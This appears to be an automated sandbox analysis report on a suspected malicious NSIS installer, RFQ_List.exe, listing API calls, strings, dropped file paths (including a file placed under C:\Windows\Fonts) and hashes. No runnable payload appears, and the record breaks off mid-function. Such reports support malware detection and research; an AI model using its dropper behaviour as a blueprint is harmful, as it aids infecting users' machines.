lstrcmpiW.KERNEL32(?,.exe,Space required: ,?,?,?,Space required: ,00000000,C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
GetFileAttributesW.KERNEL32(Space required: ), ref: 004039BD
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes), ref: 00403A06
RegisterClassW.USER32(00433EA0), ref: 00403A43
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
ShowWindow.USER32(00000005,00000000), ref: 00403AC6
GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
RegisterClassW.USER32(00433EA0), ref: 00403B08
DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27

Strings

_Nb, xrefs: 00403A22, 00403A8A
RichEd32, xrefs: 00403ADA
RichEd20, xrefs: 00403ACC
.DEFAULT\Control Panel\International, xrefs: 0040390A
"C:\Users\user\Desktop\RFQ_List.exe", xrefs: 004038A1
RichEdit20W, xrefs: 00403AEA, 00403AF0
C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes, xrefs: 0040392E, 00403936, 004039D9, 004039DF, 004039EF
.exe, xrefs: 004039AC
C:\Users\user\AppData\Local\Temp\, xrefs: 004038A3
RichEdit, xrefs: 00403AF9
Space required: , xrefs: 00403966, 0040396F, 0040397D, 004039CC, 004039D2
1033, xrefs: 004038BE, 0040391A
Control Panel\Desktop\ResourceLocale, xrefs: 004038D2

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\RFQ_List.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$Space required: $_Nb
API String ID: 606308-2351675733
Opcode ID: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
Opcode Fuzzy Hash: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D

Function 00402DEE Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402DFF
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\RFQ_List.exe,00000400,?,?,00000000,0040353A,?), ref: 00402E1B

Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\RFQ_List.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50

GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RFQ_List.exe,C:\Users\user\Desktop\RFQ_List.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67

Strings

Null, xrefs: 00402EE5
Error launching installer, xrefs: 00402E3E
(*B, xrefs: 00402E7C
C:\Users\user\Desktop, xrefs: 00402E49, 00402E4E, 00402E54
soft, xrefs: 00402EDC
C:\Users\user\AppData\Local\Temp\, xrefs: 00402DF5
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
Inst, xrefs: 00402ED3
C:\Users\user\Desktop\RFQ_List.exe, xrefs: 00402E05, 00402E14, 00402E28, 00402E48
"C:\Users\user\Desktop\RFQ_List.exe", xrefs: 00402DF4

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\RFQ_List.exe"$(*B$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\RFQ_List.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-4275170819
Opcode ID: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
Opcode Fuzzy Hash: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD

Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,C:\Windows\Fonts\sipunculid.gra,C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes,?,?,00000031), ref: 004017A8
CompareFileTime.KERNEL32(-00000014,?,C:\Windows\Fonts\sipunculid.gra,C:\Windows\Fonts\sipunculid.gra,00000000,00000000,C:\Windows\Fonts\sipunculid.gra,C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes,?,?,00000031), ref: 004017CD

Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062

Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D8A2,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D8A2,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D8A2,74DF23A0), ref: 0040520F
Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F

Strings

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes, xrefs: 00401796
C:\Windows\resources\0809\gildes.lak, xrefs: 0040182D, 00401849
C:\Windows\Fonts\sipunculid.gra, xrefs: 00401785, 0040178E, 0040179B, 004017AD, 004017B9, 004017EF, 00401805, 00401823, 0040185F, 004018E0, 004018E9, 004018F3, 004018FE
Copy to C:\Users\Public\Desktop\Bardehvalers.unw, xrefs: 00401819, 00401837

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes$C:\Windows\Fonts\sipunculid.gra$C:\Windows\resources\0809\gildes.lak$Copy to C:\Users\Public\Desktop\Bardehvalers.unw
API String ID: 1941528284-4085930999
Opcode ID: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
Opcode Fuzzy Hash: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D

Function 00403027 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403091
GetTickCount.KERNEL32 ref: 00403138
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403161
wsprintfW.USER32 ref: 00403174

Strings

... %d%%, xrefs: 0040316E
jA, xrefs: 004030E7
jA, xrefs: 004031F1

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: jA$ jA$... %d%%
API String ID: 551687249-2167919867
Opcode ID: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
Opcode Fuzzy Hash: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA

Function 0040237B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
lstrlenW.KERNEL32(Copy to C:\Users\Public\Desktop\Bardehvalers.unw,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
RegSetValueExW.KERNELBASE(?,?,?,?,Copy to C:\Users\Public\Desktop\Bardehvalers.unw,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
RegCloseKey.ADVAPI32(?,?,?,Copy to C:\Users\Public\Desktop\Bardehvalers.unw,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Strings

Copy to C:\Users\Public\Desktop\Bardehvalers.unw, xrefs: 004023CA, 004023D8, 004023EF, 004023FF, 0040240A

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: Copy to C:\Users\Public\Desktop\Bardehvalers.unw
API String ID: 1356686001-2199123339
Opcode ID: 8d1fa541b4be6473b4eebec5251f87ec0d75fe525894c7cf72dd691243c30abf
Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
Opcode Fuzzy Hash: 8d1fa541b4be6473b4eebec5251f87ec0d75fe525894c7cf72dd691243c30abf
Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668

Function 00405683 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
GetLastError.KERNEL32 ref: 004056DA
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
GetLastError.KERNEL32 ref: 004056F9

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004056A9

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-3081826266
Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9

Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
RegCloseKey.ADVAPI32(?), ref: 00402C65
RegCloseKey.ADVAPI32(?), ref: 00402C8A
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2ab96bb9c8b0da62a7224089158166dac983fcd7cb36fe929a5c9b4a96f383ba
Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
Opcode Fuzzy Hash: 2ab96bb9c8b0da62a7224089158166dac983fcd7cb36fe929a5c9b4a96f383ba
Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28

Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57

Strings

!, xrefs: 00401C13

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68

Function 00405F22 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Space required: ,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Space required: ,?), ref: 00405F4C
RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Space required: ,?), ref: 00405F6D
RegCloseKey.ADVAPI32(?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Space required: ,?), ref: 00405F90

Strings

Space required: , xrefs: 00405F25

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Space required:
API String ID: 3677997916-1411000802
Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction ID: 7b18913d2a4f7d1a63d21b64be8b0843a819b9ea39c2317e7442ba644687e02f
Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction Fuzzy Hash: 1801483110060AAECB218F66ED08EAB3BA8EF94350F01402AFD44D2260D734D964CBA5

Function 00405C59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405C77
GetTempFileNameW.KERNELBASE(0040A300,?,00000000,?,?,?,00000000,0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405C92

Strings

nsa, xrefs: 00405C66
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C5E

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-678247507
Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68

Function 004063BF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
wsprintfW.USER32 ref: 00406411
LoadLibraryW.KERNELBASE(?), ref: 00406421

Strings

%s%S.dll, xrefs: 0040640B

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll
API String ID: 2200240437-2744773210
Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8

Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D8A2,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
